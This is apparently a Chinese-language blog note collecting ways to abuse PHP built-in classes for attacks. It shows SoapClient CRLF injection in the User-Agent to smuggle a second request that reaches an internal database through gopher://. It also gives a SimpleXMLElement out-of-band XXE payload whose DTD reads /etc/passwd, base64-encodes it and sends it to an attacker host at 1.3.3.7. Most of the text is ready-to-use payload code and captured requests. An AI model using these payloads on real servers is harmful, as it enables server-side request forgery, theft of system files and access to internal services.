php 内置类利用总结

不畏将来,不念过往。如此,安好!

Someone famous 丰子恺

主要用于SSRF

0X1 SoapClient

$a = new SoapClient(null,array('location' => "http://127.0.0.1:9999/path1" , 'uri' => 'http://127.0.0.1:9999/path' ));

$a->something(array("a"=>6));

location 是 需要访问的地址 。  uri 是需要用到的服务地址 出现在SOAPAction 头里面,重要的是location 回显如下:

root@maple:~# nc -l -p 9999
POST /path1 HTTP/1.1
Host: 127.0.0.1:9999
Connection: Keep-Alive
User-Agent: PHP-SOAP/7.3.0-2
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://127.0.0.1:9999/path#something"
Content-Length: 625

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://127.0.0.1:9999/path" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:something><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">a</key><value xsi:type="xsd:int">6</value></item></param0></ns1:something></SOAP-ENV:Body></SOAP-ENV:Envelope>


利用点在于 ua 可以自定义并且 可以CRFL \r\n

$a->_user_agent = "AAAAAHaha\r\n\r\nGET /miniProxy.php?gopher:///db:1433/A"." HTTP/1.1\r\nHost: localhost\r\n\r\n";

nginx apache 都接受一个请求 包含多个 http方法的请求 如下:

POST /path1 HTTP/1.1
Host: 127.0.0.1:9999
Connection: Keep-Alive
User-Agent: AAAAAHaha

GET /miniProxy.php?gopher:///db:1433/A HTTP/1.1
Host: localhost


Content-Type: text/xml; charset=utf-8
SOAPAction: "http://127.0.0.1:9999/path#something"
Content-Length: 625

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://127.0.0.1:9999/path" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:something><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">a</key><value xsi:type="xsd:int">6</value></item></param0></ns1:something></SOAP-ENV:Body></SOAP-ENV:Envelope>

get / post 都可以接受并且处理,可以绕某些东西

有必要去看下go 这一块的处理


0x2 SimpleXMlElement


final public SimpleXMLElement::__construct ( string $data [, int $options = 0 [, bool $data_is_url = FALSE [, string $ns = "" [, bool $is_prefix = FALSE ]]]] )


注意 默认是不解析实体的 $options =LIBXML_NOENT 设置解析实体, 一边data 都是外部引用的 $data_is_url 也要设置成true


xxe.xml

<?xml version="1.0" ?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY % sp SYSTEM"http://1.3.3.7:8000/xxe.dtd">

%sp;

%param1;

]>

<r>&exfil;</r>


xxe.dtd

<!ENTITY % data SYSTEM"php://filter/convert.base64-encode/resource=/etc/passwd">

<!ENTITY % param1 "<!ENTITYexfil SYSTEM 'http://1.3.3.7:8000/?%data;'>">


  


标签

注意!

Warning! 关注一下!